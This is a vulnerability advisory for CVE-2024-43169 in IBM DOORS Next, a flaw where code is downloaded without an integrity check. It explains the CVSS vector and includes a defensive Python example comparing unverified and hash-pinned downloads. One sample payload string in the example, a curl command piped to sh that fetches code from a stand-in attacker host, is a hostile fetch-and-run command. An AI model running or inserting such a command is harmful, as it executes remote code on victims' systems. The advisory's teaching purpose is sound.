CVE-2024-43169
Published: 03 March 2025
Description
An adversary may rely upon a user opening a malicious file in order to gain execution.
Security Summary
IBM Engineering Requirements Management DOORS Next versions 7.0.2, 7.0.3, and 7.1 are affected by CVE-2024-43169, a vulnerability that allows a user to download a malicious file without the integrity of the code being verified. The issue is classified under CWE-494 (Download of Code Without Integrity Check) and has a CVSS v3.1 base score of 8.8 (High).
The CVSS v3.1 vector is AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H: an unauthenticated (PR:N), remote (AV:N) attacker with low attack complexity (AC:L) needs only to induce a user into an action such as following a link or downloading a file (UI:R). Successful exploitation carries high confidentiality, integrity and availability impact (C:H/I:H/A:H), potentially arbitrary code execution on the victim's system, with the security scope unchanged (S:U).
For mitigation details, including available patches and remediation steps, refer to the IBM security bulletin at https://www.ibm.com/support/pages/node/7184506.
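The weakness class above, CWE-494, is easiest to see side by side: a client that takes whatever the origin serves and hands it on to be run, beside one that pins a digest obtained out of band and refuses anything else. The block below is an added example, not code from IBM or from DOORS Next; the in-memory origin, the two sample payloads and the pinned digest are all constructed here so it runs offline, and a real client would stream the chunks from an HTTP response instead.

```python
"""Added example (not IBM or DOORS Next code): the download-without-
integrity-check pattern behind CWE-494 beside a hardened form that pins
a SHA-256 digest and rejects anything that does not match it."""
import hashlib
import hmac
from typing import Iterator, Optional, Tuple

# Constructed sample artifacts: the genuine file the user expects, and a
# tampered substitute an attacker placed at (or on the path to) the origin.
GENUINE_PLUGIN = b"#!/bin/sh\necho 'installing client extension'\n"
TAMPERED_PLUGIN = b"#!/bin/sh\ncurl -s http://attacker.invalid/x | sh\n"

# In practice this digest comes from a trusted out-of-band channel (a signed
# manifest, the vendor bulletin). Here it is derived from the genuine bytes
# purely so the example is self-contained.
PINNED_SHA256 = hashlib.sha256(GENUINE_PLUGIN).hexdigest()

# Constructed stand-in for the remote server: one name serves the genuine
# file, the other has been swapped for the attacker's payload.
FAKE_ORIGIN = {
    "extension-genuine.sh": GENUINE_PLUGIN,
    "extension-tampered.sh": TAMPERED_PLUGIN,
}


def fetch_chunks(name: str, chunk_size: int = 16) -> Iterator[bytes]:
    """Stand-in for iterating over an HTTP response body in chunks."""
    body = FAKE_ORIGIN[name]
    for i in range(0, len(body), chunk_size):
        yield body[i:i + chunk_size]


def download_unverified(name: str) -> bytes:
    """CWE-494 pattern: whatever the origin returns is handed straight to
    the caller, which will typically write it to disk and run it."""
    return b"".join(fetch_chunks(name))


def download_verified(name: str, expected_sha256: str) -> Tuple[bool, Optional[bytes]]:
    """Hardened form: hash the body as it streams in, compare against the
    pinned digest in constant time, and release the bytes only on a match.
    Returns (accepted, data); data is None on rejection so a caller cannot
    accidentally execute content that failed verification."""
    digest = hashlib.sha256()
    buffered = bytearray()
    for chunk in fetch_chunks(name):
        digest.update(chunk)
        buffered.extend(chunk)
    if not hmac.compare_digest(digest.hexdigest(), expected_sha256.lower()):
        # Do not retain or run the payload; report the mismatch instead.
        return False, None
    return True, bytes(buffered)


if __name__ == "__main__":
    # The vulnerable path returns the attacker's script unchallenged.
    print("unverified:", download_unverified("extension-tampered.sh"))
    # The hardened path rejects it and accepts only the genuine artifact.
    print("verified (tampered):", download_verified("extension-tampered.sh", PINNED_SHA256))
    print("verified (genuine): ", download_verified("extension-genuine.sh", PINNED_SHA256))
```

A pinned digest only helps when the digest itself reaches the client over a channel the attacker cannot rewrite; where the vendor publishes code-signing keys, verifying a signature over the artifact (or over a manifest of digests) is the stronger form of the same check, and either way the verification has to happen before the bytes are written anywhere a user might open them.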
Details
- CWE(s): CWE-494 (Download of Code Without Integrity Check)
- Affected Products: IBM Engineering Requirements Management DOORS Next 7.0.2, 7.0.3 and 7.1
- MITRE ATT&CK Enterprise Techniques: user execution of a malicious file (the technique described under Description above)
Why these techniques?
DOORS Next does not verify the integrity of code it lets a user download (CWE-494), so an attacker who can serve or substitute a malicious file needs only the user to download and open it. The user's action supplies the execution step, which is why the mapped technique is user execution of a malicious file and why the CVSS vector carries UI:R; the outcome is arbitrary code execution on the victim's system.